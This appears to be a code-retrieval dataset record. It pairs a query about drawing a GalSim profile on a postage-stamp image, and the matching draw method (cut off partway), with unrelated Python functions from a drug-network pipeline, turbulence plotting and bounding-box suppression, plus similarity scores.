'network_of_expansion')\n drug_dir = os.path.join(data_dir, drug_id)\n create_directory(drug_dir)\n print(' DIANA INFO:\\tThe ID given to the drug, which will be used to create a directory and store the results, is: {}\\n'.format(drug_id))\n\n # Create a directory for the dcTargets results\n dctargets_dir = os.path.join(drug_dir, 'dctargets_profiles')\n create_directory(dctargets_dir)\n\n # Create a directory for the dcGUILD results\n dcguild_dir = os.path.join(drug_dir, 'dcguild_profiles')\n create_directory(dcguild_dir)\n\n # Create a directory for the dcStructure results\n dcstructure_dir = os.path.join(drug_dir, 'dcstructure_profiles')\n create_directory(dcstructure_dir)\n\n # Create a directory for the dcATCs results\n ATCs_dir = os.path.join(drug_dir, 'dcatc_profiles')\n create_directory(ATCs_dir)\n\n # Create a directory for the dcse results\n SE_dir = os.path.join(drug_dir, 'dcse_profiles')\n create_directory(SE_dir)\n\n # Create a targets file\n targets_file = os.path.join(dctargets_dir, '{}_targets.txt'.format(drug_instance.drug_name))\n diana_drug.create_targets_file(drug_instance.targets, targets_file)\n\n\n\n #------------------------#\n # 
NETWORK GENERATION #\n #------------------------#\n\n # NETWORK GENERATION: Generates a network expanding it from the targets provided.\n # The network is expanded as many neighbors as indicated in the parameter 'radius'.\n\n # We create a network of expansion from the targets\n print(' DIANA INFO:\\tGenerating network for {}. This can take a few minutes...\\n'.format(options.drug_name))\n\n network_dir = os.path.join(drug_dir, 'network_of_expansion')\n create_directory(network_dir)\n node_file = os.path.join(network_dir, '{}_network.nodes'.format(drug_instance.drug_name))\n edge_file = os.path.join(network_dir, '{}_network.edges'.format(drug_instance.drug_name))\n translation_file = os.path.join(network_dir, '{}_network_trans_to_{}.trans'.format(drug_instance.drug_name, options.proteins_type_id))\n targets_translation_file = os.path.join(network_dir, 'targets_to_BIANA.trans')\n\n if not fileExist(edge_file):\n\n # By direct command (it works)\n restriction = process_restriction(options.restriction)\n command = 'python {} -iseed {} -radius {} -taxid {} -stype {} -ttype {} -trans {} -strans {} -node {} -edge {} -db {} -up {} {}'.format(\n os.path.join(toolbox_dir, 'generate_netscore_files_vapr2017.py'),\n targets_file, options.radius, options.taxid, options.proteins_type_id, options.proteins_type_id, translation_file, targets_translation_file, node_file, edge_file,\n config.get('BIANA', 'database'), config.get('BIANA', 'unification_protocol'), restriction\n )\n os.system(command)\n\n # By importing the module (it does not work!!!)\n # restricted_to_TAP, restricted_to_Y2H, restricted_to_user, except_TAP, except_Y2H, except_user = network_generation.check_restriction(options.restriction)\n # network_generation.generate_network(drug_instance.targets, drug_instance.type_id, options.radius, options.taxid, translation_file, options.proteins_type_id, node_file, edge_file,\n # restricted_to_TAP = restricted_to_TAP, restricted_to_Y2H = restricted_to_Y2H, restricted_to_user = restricted_to_user,\n # except_TAP = except_TAP, except_Y2H = except_Y2H, except_user = except_user,\n # database = options.database, unification_protocol = options.unification_protocol,\n # output_format = 'sif', verbose = False)\n\n else:\n print(' DIANA INFO:\\tThe network of expansion for {} was already done and it has been skipped.\\n'.format(options.drug_name))\n\n network_instance = network_analysis.Network(edge_file, None, 'biana', 'sif')\n targets_in_network = get_targets_in_network_of_expansion(node_file)\n\n # Create a directory of random networks corresponding to this network\n random_networks_dir = os.path.join(random_networks_dir, '{}_network'.format(drug_instance.drug_name))\n create_directory(random_networks_dir)\n\n\n # Check if the number of targets provided is sufficient for the analysis\n if len(targets_in_network) < 3:\n raise diana_drug.InsufficientTargets(targets_in_network)\n else:\n print( \" DIANA INFO:\\tThe targets found in the network are:\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in targets_in_network]) ) )\n\n\n\n\n #--------------------------------#\n # SCORING OF NETWORKS (GUILD) #\n #--------------------------------#\n\n # Run GUILD\n print(\" DIANA INFO:\\tRunning GUILD (network scoring program).\\n\")\n\n # Create a directory for GUILD results\n guild_output_dir = os.path.join(drug_dir, 'guild_output')\n create_directory(guild_output_dir)\n\n # Create targets file for the targets in the network (it will be used by GUILD)\n network_targets_file = os.path.join(guild_output_dir, 
'{}_targets_in_network.txt'.format(drug_instance.drug_name))\n diana_drug.create_targets_file(targets_in_network, network_targets_file)\n\n # Run GUILD\n pvalue_file = os.path.join(guild_output_dir, 'output_scores.sif.netcombo.pval')\n if not fileExist(pvalue_file):\n\n guild_command = 'python {} {} {} {} {} {} {}'.format( os.path.join(toolbox_dir, 'run_guild.py'), drug_dir, network_targets_file, edge_file, guild_output_dir, random_networks_dir, config.get('Paths', 'guild_path') )\n os.system(guild_command)\n print(' DIANA INFO:\\tGUILD has finished.\\n')\n\n else:\n print(' DIANA INFO:\\tThe scoring of the network with GUILD for {} was already done and it has been skipped.\\n'.format(options.drug_name))\n\n # Creating an instance of the file generated by GUILD\n guild_profile_instance = network_analysis.GUILDProfile(pvalue_file, network_instance.type_id, 100)\n\n # Translate the NODE profile to protein_type_id if the type of id is 'biana'\n if guild_profile_instance.type_id == 'biana' and translation_file:\n output_file = os.path.join(guild_output_dir, 'node_profile_top_100_{}.txt'.format(options.proteins_type_id))\n guild_profile_geneid = guild_profile_instance.translate_pvalue_file(translation_file, options.proteins_type_id, output_file, verbose=False)\n\n\n\n #-------------------------------#\n # GENERATE DCGUILD PROFILES #\n #-------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF dcGUILD PROFILES\\n')\n\n # Copy the pvalue_file at the dcguild directory\n new_pvalue_file = os.path.join(dcguild_dir, 'output_scores.sif.netcombo.pval')\n shutil.copyfile(pvalue_file, new_pvalue_file)\n\n # Score the network\n scored_network_file = os.path.join(dcguild_dir, 'network_scored.txt')\n scored_network_instance = network_instance.score_network(guild_profile_instance.node_to_values, scored_network_file)\n\n # Get the list of thresholds to create the profiles\n if options.threshold_list and fileExist(options.threshold_list):\n threshold_list = get_values_from_threshold_file(options.threshold_list)\n else:\n threshold_list = [1, 5, 10, 20, 50]\n print(' DIANA INFO:\\tList of percentages used to define the drug profiles: {}\\n'.format(', '.join([str(x) for x in threshold_list])))\n\n # Load the files go and gene2go files for the functional profiles\n print(\" DIANA INFO:\\tLoading GOATOOLS for the functional analysis. 
Remember to update the files go-basic.obo and gene2go.\")\n print(\"\\t\\tpython /path/to/diana/scripts/download_go_files.py\\n\")\n obodag = GODag(os.path.join(main_path, \"diana/toolbox/go-basic.obo\"))\n geneid2gos_human = read_ncbi_gene2go(os.path.join(main_path, \"diana/toolbox/gene2go\"), taxids=[9606])\n\n for top_threshold in threshold_list:\n\n output_file = os.path.join(dcguild_dir, 'node_profile_top_{}_{}.txt'.format(str(top_threshold), guild_profile_instance.type_id))\n if not fileExist(output_file):\n\n # Generate the NODE profile from the top % scoring nodes\n node_profile_instance = guild_profile_instance.create_node_profile(top_threshold, output_file)\n\n # Translate the NODE profile to protein_type_id if the type of id is 'biana'\n if node_profile_instance.type_id == 'biana' and translation_file:\n output_file = os.path.join(dcguild_dir, 'node_profile_top_{}_{}.txt'.format(str(top_threshold), options.proteins_type_id))\n node_profile_geneid = node_profile_instance.translate_pvalue_file(translation_file, options.proteins_type_id, output_file, verbose=False)\n\n\n output_file = os.path.join(dcguild_dir, 'functional_profile_top_{}_{}.txt'.format(str(top_threshold), options.proteins_type_id))\n if not fileExist(output_file):\n\n # Generate the FUNCTIONAL profile from the top % scoring nodes of the pvalue file\n if node_profile_instance.type_id == 'biana' and translation_file:\n functional_profile_instance = node_profile_geneid.create_functional_profile(obodag, geneid2gos_human, guild_profile_geneid.node_to_values, output_file)\n else:\n functional_profile_instance = node_profile_instance.create_functional_profile(obodag, geneid2gos_human, guild_profile_instance.node_to_values, output_file)\n\n\n output_file = os.path.join(dcguild_dir, 'edge_profile_top_{}_{}.txt'.format(str(top_threshold), guild_profile_instance.type_id))\n if not fileExist(output_file):\n\n # Generate the EDGE profile from the top % scoring nodes of the pvalue file\n edge_profile_instance = scored_network_instance.create_edge_profile(guild_profile_instance.node_to_values, top_threshold, output_file)\n\n # Translate the EDGE profile to protein_type_id if the type of id is 'biana'\n if edge_profile_instance.type_id == 'biana' and translation_file:\n output_file = os.path.join(dcguild_dir, 'edge_profile_top_{}_{}.txt'.format(str(top_threshold), options.proteins_type_id))\n edge_profile_geneid = edge_profile_instance.translate_network(translation_file, options.proteins_type_id, output_file, verbose=False)\n\n\n\n #---------------------------------#\n # GENERATE DCTARGETS PROFILES #\n #---------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF dcTARGETS PROFILES\\n')\n\n # Create PFAM profile from targets\n pfam_file = os.path.join(dctargets_dir, 'pfam_profile.txt')\n\n if not fileExist(pfam_file):\n # Create a connection to BIANA database\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n # Obtain the PFAMs from BIANA\n drug_instance.obtain_pfams_from_targets(biana_cnx, pfam_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_pfams_from_file(pfam_file)\n\n print( \" DIANA INFO:\\tThe PFAMs obtained from the targets are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.pfams]) ) )\n\n\n # Create the FUNCTIONAL profile from targets\n output_file = os.path.join(dctargets_dir, 
'targets_functional_profile.txt')\n if not fileExist(output_file):\n\n if guild_profile_instance.type_id == 'biana' and translation_file:\n #targets_in_network_geneid = translate_targets_to_type_id(targets_translation_file, targets_in_network)\n #targets_functional_profile_instance = top_scoring.functional_top_scoring(obodag, geneid2gos_human, guild_profile_geneid.node_to_values.keys(), targets_in_network_geneid, output_file)\n # First we add the targets that are not in the network among all the nodes in the network, to use them as background\n # Because if one of them is not among the background genes, the program raises an error!\n all_nodes_geneid = set(guild_profile_geneid.node_to_values.keys())\n for target in drug_instance.targets:\n all_nodes_geneid.add(target)\n top_scoring.functional_top_scoring(obodag, geneid2gos_human, list(all_nodes_geneid), drug_instance.targets, output_file)\n else:\n # Here we also add the targets that are not in the network among all the nodes in the network, to use them as background\n all_nodes_geneid = set(guild_profile_instance.node_to_values.keys())\n for target in drug_instance.targets:\n all_nodes_geneid.add(target)\n top_scoring.functional_top_scoring(obodag, geneid2gos_human, list(all_nodes_geneid), drug_instance.targets, output_file)\n\n\n\n #-----------------------------------#\n # GENERATE DCSTRUCTURE PROFILES #\n #-----------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF dcSTRUCTURE PROFILES\\n')\n\n # Obtain the SMILES of the compound from the database\n structure_file = os.path.join(dcstructure_dir, 'structure_profile.txt')\n\n if not fileExist(structure_file):\n # Create a connection to BIANA database\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n # Obtain the PFAMs from BIANA\n drug_instance.obtain_SMILES_from_BIANA(biana_cnx, structure_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_SMILES_from_file(structure_file)\n\n print( \" DIANA INFO:\\tThe SMILES obtained are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.smiles]) ) )\n\n\n\n #---------------------------#\n # GENERATE ATC PROFILES #\n #---------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF ATCs PROFILES\\n')\n\n #inside TARGETS CONTROLLER insert function that creates directory. 
By now: ATC_dir\n ATC_file = os.path.join(ATCs_dir,'ATC_profile.txt')\n\n if not fileExist(ATC_file):\n #search in BIANA\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n drug_instance.obtain_ATCs_from_BIANA(biana_cnx, ATC_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_ATCs_from_file(ATC_file)\n print( \" DIANA INFO:\\tThe ATCs obtained from the targets are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.ATCs])))\n\n\n\n #-----------------------------------#\n # GENERATE SIDE EFFECT PROFILES #\n #-----------------------------------#\n\n print(' DIANA INFO:\\tSTARTING GENERATION OF SEs PROFILES\\n')\n\n SE_file = os.path.join(SE_dir,'SE_profile.txt')\n\n if not fileExist(SE_file):\n #search in BIANA\n biana_cnx = mysql.connector.connect(user=config.get('BIANA', 'user'), password=config.get('BIANA', 'password'),\n host=config.get('BIANA', 'host'),\n database=config.get('BIANA', 'database'))\n drug_instance.obtain_SE_from_BIANA(biana_cnx, SE_file, config.get('BIANA', 'unification_protocol'))\n biana_cnx.close()\n else:\n drug_instance.obtain_SE_from_file(SE_file)\n if len(drug_instance.SEs) > 0:\n print( \" DIANA INFO:\\tThe Side Effects obtained from the targets are\\n\\t\\t{}.\\n\".format( ', '.join([ str(x) for x in drug_instance.SEs])))\n\n\n\n # End marker for time\n end = time.time()\n print('\\n DIANA INFO:\\tTIME OF EXECUTION: {:.3f} seconds or {:.3f} minutes.\\n'.format(end - start, (end - start) / 60))\n\n return", "def profile(script, argv, timer, pickle_protocol, dump_filename, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n __profile__(filename, code, globals_,\n timer=timer, pickle_protocol=pickle_protocol,\n dump_filename=dump_filename, mono=mono)", "def basicplots(self,\r\n p,\r\n Tavg=None,\r\n Snap=None,\r\n Snap_X=None,\r\n Snap_Y=None,\r\n Snap_Z=None,\r\n Point=None,\r\n dns_profiles=False):\r\n #draw the basic figures\r\n #self.getMean(p, Tavg, avgScalar)\r\n zmax=np.shape(Tavg.u)[2]\r\n if dns_profiles:\r\n self.getdns()\r\n #avgScalar plays the role of Scalar\r\n # basic plots\r\n if p.avgVelocities and Tavg is not None:\r\n #plt.figure(figsize=[30,20])\r\n #specify the length and width of the figure, unit is inch, 1 inch=2.54cm.\r\n #dpi of my computer:13_U_U*7_U8, dpi is the number of pixel point per inch ?\r\n\r\n #compare LES streamwise velocity profile with that of D_US\r\n fig, axs = plt.subplots(2, 3, tight_layout=True)\r\n axs[0, 0].plot(p.z_uv[0:zmax], Tavg.uMean, 'b')\r\n if dns_profiles:\r\n axs[0, 0].plot(self.dns_z, self.dns_u, 'r')\r\n axs[0, 0].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle u \\rangle$')\r\n \r\n\r\n #compare LES streamwise velocity profile with that of D_US and Log Law in a semilog coordinate\r\n kappa = p.vonk\r\n z0 = p.zo #aerodynamic surface roughness, demensionaless\r\n loglaw = 1 / kappa * np.log(p.z_uv[0:zmax] / z0) # rough wall\r\n p1, = axs[0, 1].semilogx(\r\n p.z_uv[0:zmax], loglaw, 'k') # , is necessary for plot, semilog etc.\r\n p2 = axs[0, 1].scatter(p.z_uv[0:zmax],\r\n Tavg.uMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n p3, = axs[0, 1].semilogx(self.dns_z, self.dns_u, 'r')\r\n axs[0, 1].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle \\bar{\\tilde{u}} \\rangle$',\r\n xlim=[0.01, 1])\r\n if dns_profiles:\r\n axs[0, 1].legend([p1, p2, p3], ['Log Law', 
'LES', 'DNS'])\r\n else:\r\n axs[0, 1].legend([p1, p2], ['Log Law', 'LES'])\r\n\r\n #compare LES's profiles of uw,txz,txz+uw with that of D_US\r\n p1 = axs[0, 2].scatter(p.z_w[0:zmax],\r\n -Tavg.uwMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n p2 = axs[0, 2].scatter(p.z_w[0:zmax],\r\n -Tavg.txzMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='c')\r\n p3 = axs[0, 2].scatter(p.z_w[0:zmax],\r\n -Tavg.txzMean - Tavg.uwMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='k')\r\n if dns_profiles:\r\n p4, = axs[0, 2].plot(self.dns_z, -self.dns_uw, 'b')\r\n p5, = axs[0, 2].plot(self.dns_z, self.dns_tau, 'c')\r\n p6, = axs[0, 2].plot(self.dns_z, self.dns_tau - self.dns_uw,\r\n 'k') #what are these variables' meaning?\r\n axs[0, 2].plot(p.z_w[0:zmax], (1 - p.z_w[0:zmax]), 'g')\r\n #x+y=1\r\n axs[0, 2].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle -u^\\prime w^\\prime \\rangle$')\r\n #use \\ to acquire ' in the label text\r\n if dns_profiles:\r\n axs[0, 2].legend([p1, p2, p3, p4, p5, p6], [\r\n \"LES:\"+r'$-\\langle u^\\prime w^\\prime\\rangle$',\r\n \"LES:\"+r'$-\\langle txz \\rangle$',\r\n \"LES:\"+r'$-(\\langle txz \\rangle + \\langle u^\\prime w^\\prime \\rangle)$',\r\n \"DNS:\"+r'$-\\langle u^\\prime w^\\prime\\rangle$',\r\n \"DNS:\"+r'$-\\langle txz \\rangle$',\r\n \"DNS:\"+r'$-(\\langle txz \\rangle + \\langle u^\\prime w^\\prime \\rangle)$'\r\n ])\r\n else:\r\n axs[0, 2].legend(\r\n [p1, p2, p3],\r\n [\"LES:\"+r'$-\\langle u^\\prime w^\\prime \\rangle$',\r\n \"LES:\"+r'$-\\langle txz \\rangle$',\r\n \"LES:\"+r'$-(\\langle txz \\rangle + \\langle u^\\prime w^\\prime \\rangle)$'])\r\n\r\n #compare LES's profile of uu with that of D_US\r\n p1 = axs[1, 0].scatter(p.z_uv[0:zmax],\r\n Tavg.uuMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n p2, = axs[1, 0].plot(self.dns_z, self.dns_uu, 'b')\r\n \r\n if dns_profiles:\r\n axs[1, 0].legend([p1, p2], ['LES', 'DNS'])\r\n else:\r\n axs[1, 0].legend([p1], ['LES'])\r\n axs[1, 0].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle u^\\prime u^\\prime \\rangle$',\r\n ylim=[0, 8])\r\n\r\n #compare LES's profile of ww with that of D_US\r\n axs[1, 1].scatter(p.z_uv[0:zmax],\r\n Tavg.vvMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n axs[1, 1].plot(self.dns_z, self.dns_vv, 'b')\r\n axs[1, 1].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle v^\\prime v^\\prime \\rangle$',\r\n ylim=[0, 4])\r\n if dns_profiles:\r\n axs[1, 1].legend([p1, p2], ['LES', 'DNS'])\r\n else:\r\n axs[1, 1].legend([p1], ['LES'])\r\n\r\n #compare LES's profile of ww with that of DNS\r\n axs[1, 2].scatter(p.z_w[0:zmax],\r\n Tavg.wwMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n if dns_profiles:\r\n axs[1, 2].plot(self.dns_z, self.dns_ww, 'b')\r\n axs[1, 2].set(xlabel=r'$z/z_i$', ylabel=r'$\\langle w^\\prime w^\\prime \\rangle$',\r\n ylim=[0, 2])\r\n if dns_profiles:\r\n axs[1, 2].legend([p1, p2], ['LES', 'DNS'])\r\n else:\r\n axs[1, 2].legend([p1], ['LES'])\r\n fig.show()\r\n\r\n if p.avgScalar and Tavg is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n ax.scatter(p.z_w[0:zmax],\r\n Tavg.wpthetapMean,\r\n marker='o',\r\n c='w',\r\n edgecolors='b')\r\n ax.scatter(p.z_w[0:zmax], Tavg.sgst3Mean, marker='o', c='w', edgecolors='c')\r\n ax.scatter(p.z_w[0:zmax],\r\n Tavg.wpthetapMean + Tavg.sgst3Mean,\r\n marker='o',\r\n c='w',\r\n edgecolors='k')\r\n ax.plot(p.z_w[0:zmax],p.wt_s*np.ones(zmax)/p.T_scale/p.u_star,'--')\r\n ax.set(xlabel=r'$z/z_i$', ylabel=r'$\\langle w^\\prime\\theta^\\prime \\rangle$',\r\n ylim=[-0.001, 0.001])\r\n 
fig.show()\r\n\r\n if p.domain_snapshots and Snap is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Y, X = np.meshgrid(p.y, p.x)\r\n mappable = ax.pcolor(X, Y, Snap.ui[:, :, 4])\r\n ax.set(xlabel=r'$x/z_i$', ylabel=r'$y/z_i$', title=r'Streamwise velocity at z = ' + str(p.z_uv[4]))\r\n ax.axis(\"image\")\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.x_snapshots and Snap_X is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Z, Y = np.meshgrid(p.z_uv[0:zmax], p.y)\r\n mappable = ax.pcolor(Y, Z, Snap_X.ux)\r\n ax.set(xlabel=r'$y/z_i$', ylabel=r'$z/z_i$', title='Streamwise velocity at x = ' + str(p.nx_planes))\r\n ax.axis(\"image\")\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.y_snapshots and Snap_Y is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Z, X = np.meshgrid(p.z_uv[0:zmax], p.x)\r\n mappable = ax.pcolor(X, Z, Snap_Y.uy)\r\n ax.set(xlabel=r'$x/z_i$', ylabel=r'$z/z_i$', title='Streamwise velocity at y = ' + str(p.ny_planes))\r\n ax.axis(\"image\")\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.z_snapshots and Snap_Z is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n Y, X = np.meshgrid(p.y, p.x)\r\n mappable = ax.pcolor(X, Y, Snap_Z.uz)\r\n ax.axis(\"image\")\r\n ax.set(xlabel=r'$x/z_i$', ylabel=r'$y/z_i$', title='Streamwise velocity at z = ' + str(p.nz_planes))\r\n fig.colorbar(mappable)\r\n fig.show()\r\n\r\n if p.points and Point is not None:\r\n fig, ax = plt.subplots(tight_layout=True)\r\n ax.plot(Point.t, Point.up, label='u')\r\n ax.plot(Point.t, Point.vp, label='v')\r\n ax.plot(Point.t, Point.wp, label='w')\r\n ax.set(xlabel=r'$t$', ylabel=r'$u/u_*$', xlim=[min(Point.t), max(Point.t)])\r\n ax.legend()\r\n fig.show()", "def test_propene(self):\n def draw(image: ShapeImage):\n image.add_line((400, 400), (500, 400))\n image.add_line((400, 410), (500, 410))\n image.add_line((500, 400), (587, 350))\n\n self._test_shape(\n image_size=(1000, 1000),\n expected_corners=np.array([\n [[400, 400]],\n [[500, 400]],\n [[587, 350]]\n ]),\n drawer=draw,\n expected_edges=np.array([\n [[400, 400, 500, 400]],\n [[400, 410, 500, 410]],\n [[500, 400, 587, 350]]\n ])\n )", "def prof2frame(prof):\n\n import pandas as pd\n\n # create data frame from profile dicts\n frame = pd.DataFrame(prof)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate entity type\n def _entity (row):\n if not row['uid']:\n return 'session'\n if 'unit' in row['uid']:\n return 'unit'\n if 'pilot' in row['uid']:\n return 'pilot'\n return 'session'\n frame['entity'] = frame.apply(lambda row: _entity (row), axis=1)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate if a unit / pilot / ... 
is cloned\n def _cloned (row):\n if not row['uid']:\n return False\n else:\n return 'clone' in row['uid'].lower()\n frame['cloned'] = frame.apply(lambda row: _cloned (row), axis=1)\n\n return frame", "def iou_suppression(cnt_box, yolo_box, max_threshold, min_threshold):\n all_boxes = []\n pre_bboxes = yolo_box\n bboxes = cnt_box\n for i in range(len(pre_bboxes)):\n max_flag = 0\n min_flag = 0\n for j in range(len(bboxes)):\n\n (pre_x1, pre_y1) = (pre_bboxes[i][0], pre_bboxes[i][1])\n (pre_x2, pre_y2) = (pre_bboxes[i][2], pre_bboxes[i][3])\n (cur_x1, cur_y1) = (bboxes[j][0], bboxes[j][1])\n (cur_x2, cur_y2) = (bboxes[j][2], bboxes[j][3])\n origin_w = pre_x2 - pre_x1\n origin_h = pre_y2 - pre_y1\n current_w = cur_x2 - cur_x1\n current_h = cur_y2 - cur_y1\n prime_area = origin_h * origin_w\n current_area = current_h*current_w\n\n if pre_x1 > cur_x1:\n if pre_y1 > cur_y1:\n if cur_x2 - pre_x1 <= 0 or cur_y2 - pre_y1 <= 0:\n lap_area = 0\n else:\n width = cur_x2 - pre_x1\n height = cur_y2 - pre_y1\n if width > origin_w:\n width = origin_w\n if height > origin_h:\n height = origin_h\n\n lap_area = width*height\n\n else:\n if cur_x2 - pre_x1 <= 0 or pre_y2 - cur_y1 <= 0:\n lap_area = 0\n else:\n width = cur_x2 - pre_x1\n height = pre_y2 - cur_y1\n if width > origin_w:\n width = origin_w\n if height > current_h:\n height = current_h\n\n lap_area = width*height\n else:\n if pre_y1 > cur_y1:\n if pre_x2 - cur_x1 <= 0 or cur_y2 - pre_y1 <= 0:\n lap_area = 0\n else:\n width = pre_x2 - cur_x1\n height = cur_y2 - pre_y1\n if width > current_w:\n width = current_w\n if height > origin_h:\n height = origin_h\n\n lap_area = width*height\n else:\n if pre_x2 - cur_x1 <= 0 or pre_y2 - cur_y1 <= 0:\n lap_area = 0\n else:\n width = pre_x2 - cur_x1\n height = pre_y2 - cur_y1\n if width > current_w:\n width = current_w\n if height > current_h:\n height = current_h\n\n lap_area = width*height\n\n if lap_area != 0:\n sum_area = (prime_area + current_area - lap_area)\n iou_score = lap_area/sum_area\n if iou_score > max_threshold: # set the threshold of the iou scores, in line with the sort\n max_flag = 1\n elif iou_score > min_threshold:\n min_flag = 1\n\n if max_flag == 1 or min_flag == 0:\n all_boxes.append(pre_bboxes[i])\n\n if cnt_box != []:\n for index_box in range(cnt_box.shape[0]):\n all_boxes.append(cnt_box[index_box])\n\n return np.asarray(all_boxes)" ]
[ "0.6533734", "0.51599497", "0.47828445", "0.47232333", "0.45972005", "0.45731962", "0.45694324", "0.45572576", "0.45465982", "0.45340365", "0.44940332", "0.44605252", "0.44413173", "0.44082165", "0.4281743", "0.4263862", "0.42636248", "0.42611814", "0.42450166", "0.42342076", "0.4228299", "0.42116234", "0.4206318", "0.42003477", "0.41977915", "0.41658568", "0.41562256", "0.41488603", "0.4140673", "0.41311204", "0.40905902", "0.4088185", "0.40718707", "0.4056747", "0.40441948", "0.40420005", "0.4039595", "0.40303034", "0.40242964", "0.40105534", "0.40027088", "0.40022877", "0.3991677", "0.398981", "0.39851663", "0.39722535", "0.39696342", "0.39622208", "0.39426336", "0.39404994", "0.3938015", "0.3936895", "0.39338621", "0.3921276", "0.39073977", "0.39037496", "0.39008337", "0.3895338", "0.38913122", "0.3885896", "0.3884199", "0.38749436", "0.38694957", "0.38611177", "0.38552186", "0.38543135", "0.38508406", "0.38423482", "0.38373587", "0.38370582", "0.38195834", "0.38184926", "0.381795", "0.3817473", "0.3807116", "0.38061726", "0.37901014", "0.37884796", "0.37860972", "0.37798375", "0.37740415", "0.37733015", "0.37731147", "0.3772506", "0.37702903", "0.3758757", "0.37558293", "0.37515476", "0.3747827", "0.37421316", "0.37336633", "0.37335995", "0.37334308", "0.37331188", "0.37310427", "0.3730547", "0.3726281", "0.37252617", "0.37227973", "0.37178838" ]
0.67846763
0
Draw the profile on the postage stamp image. This is a slightly modified version of `stamp.DrawBasic()` which allows drawing of chromatic objects. Parameters: prof: the profile to draw; image: the image onto which to draw the profile (which may be None); method: the method to use in drawImage; offset: the offset to apply when drawing; config: the configuration dict for the stamp field; base: the base configuration dict; logger: if given, a logger object to log progress. Returns: the resulting image.
def draw(self, prof, image, method, offset, config, base, logger, **kwargs): # ... draw prof onto the given image (making a new Image if necessary) if prof is None: return image else: logger = galsim.config.LoggerWrapper(logger) # Setup the kwargs to pass to drawImage # (Start with any additional kwargs given as extra kwargs to DrawBasic and add to it.) kwargs['image'] = image kwargs['offset'] = offset kwargs['method'] = method if 'wmult' in config and 'wmult' not in kwargs: # pragma: no cover kwargs['wmult'] = galsim.config.ParseValue(config, 'wmult', base, float)[0] if 'wcs' not in kwargs and 'scale' not in kwargs: kwargs['wcs'] = base['wcs'].local(image_pos = base['image_pos']) if method == 'phot' and 'rng' not in kwargs: kwargs['rng'] = galsim.config.GetRNG(config, base, logger, "method='phot'") # Check validity of extra phot options: max_extra_noise = None if 'n_photons' in config and 'n_photons' not in kwargs: if method != 'phot': raise AttributeError('n_photons is invalid with method != phot') if 'max_extra_noise' in config: logger.warning( "Both 'max_extra_noise' and 'n_photons' are set in config dict, "+ "ignoring 'max_extra_noise'.") kwargs['n_photons'] = galsim.config.ParseValue(config, 'n_photons', base, int)[0] elif 'max_extra_noise' in config: max_extra_noise = galsim.config.ParseValue(config, 'max_extra_noise', base, float)[0] if method != 'phot' and max_extra_noise is not None: raise AttributeError('max_extra_noise is invalid with method != phot') if 'poisson_flux' in config and 'poisson_flux' not in kwargs: if method != 'phot': raise AttributeError('poisson_flux is invalid with method != phot') kwargs['poisson_flux'] = galsim.config.ParseValue(config, 'poisson_flux', base, bool)[0] if max_extra_noise is not None and 'max_extra_noise' not in kwargs: if max_extra_noise < 0.: raise ValueError("image.max_extra_noise cannot be negative") if 'image' in base and 'noise' in base['image']: noise_var = galsim.config.CalculateNoiseVariance(base) else: raise AttributeError("Need to specify noise level when using max_extra_noise") if noise_var < 0.: raise ValueError("noise_var calculated to be < 0.") max_extra_noise *= noise_var kwargs['max_extra_noise'] = max_extra_noise if logger.isEnabledFor(logging.DEBUG): # Don't output the full image array. Use str(image) for that kwarg. alt_kwargs = dict([(k,str(kwargs[k]) if isinstance(kwargs[k],galsim.Image) else kwargs[k]) for k in kwargs]) logger.debug('obj %d: drawImage kwargs = %s',base.get('obj_num',0), alt_kwargs) logger.debug('obj %d: prof = %s',base.get('obj_num',0),prof) try: # NOTE: Old version: # image = prof.drawImage(**kwargs) if isinstance(prof, galsim.GSObject): image = prof.drawImage(**kwargs) elif isinstance(prof, galsim.ChromaticObject): bp = {} for key in (self._req_bp_fields+self._opt_bp_fields): try: bp[key] = config['bandpass'][key] except KeyError: bp[key] = None bandpass = 